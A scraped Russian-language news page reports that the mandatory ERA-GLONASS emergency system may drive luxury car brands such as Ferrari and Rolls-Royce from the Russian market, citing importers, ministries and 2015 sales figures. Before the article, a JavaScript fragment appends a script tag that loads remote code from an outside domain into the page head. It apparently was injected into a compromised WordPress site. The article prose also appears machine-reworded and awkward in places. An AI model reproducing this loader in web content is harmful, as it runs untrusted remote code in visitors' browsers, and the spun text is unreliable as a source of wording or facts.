, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

wordpress themes.

ГЛОНАСС может оставить РФ без люксовых авто

Просьба освободить малые партии исходила, сначала, от импортеров люксовых авто, таковых как Роллс Ройс, Ferrari, Maserati, Lamborghini и других.

Так, по утверждению операционного директора компании «Авилона» (импортер Феррари, Aston Martin, Bugatti) по люксовым брендам Вагифа Бикулова, для внедрения системы безопасности в Феррари (стоимость одного автомобиля составляет 25 млн рублей — прим. ред.) в процессе краш-тестов нужно убить две машины, если в год их продается около 10-ти, то цена каждой вырастет на 5 млн рублей. Для сертификации моделей техрегламент требует провести два краш-теста, на фронтальный и боковой удары.

Инициатива касалась, в первую очередь, люксовых моделей — Rolls-Royce, Maserati, Астон Мартин — спорткаров, электромобилей Tesla, а кроме этого ряда нишевых модификаций массовых брендов, таковых как Лексус, информирует «Коммерсантъ». Это может привести к массовому уходу с рынка ряда дорогих моделей, опасаются его участники. Профильные министерства не поддержали идею избавить импортеров от внедрения системы ЭРА-ГЛОНАСС в легковые машины, завозимые малыми партиями. При этом с лета предыдущего года АЕБ и Фольксваген Group, владеющий марками Порш, Бентли и Lamborghini, говорили Минпромторгу о сложностях: из-за единичных продаж траты на систему безопасности окажутся выше прибыли от реализованных автомобилей. По мнению Минпромторга, это может увеличить уровень смертности в ДТП.

В 2015 г рынок машин класса люкс в РФ составил не менее 1157 авто, по имеющейся достоверной информации агентства «Автостат». 60 процентов продаж довелось на новый Мерседес Бенс Maybach S Class. Роллс Ройс приобретено 143 штуки, Бентли — 208, Мазерати — 77, Феррари — 20, Lamborghini — 19, Астон Мартин — 3 штуки. Ситуация связана с новым законом в нашем государстве, согласно которому все автомобили должны быть оборудованы системой ЭРА-ГЛОНАСС.

Дорогие автобренды могут уйти с российского рынка из-за внедрения системы ЭРА-ГЛОНАСС

Поделиться в соц. сетях


Вы можете пропустить чтение записи и оставить комментарий. Размещение ссылок запрещено.


Оставить комментарий


Использование материалов данного сайта запрещено, без активной гиперссылки на сайт - http://okinvest.ru.

Автор не несет ответственности за деятельность компаний, описанных на сайте. Уведомление о рисках.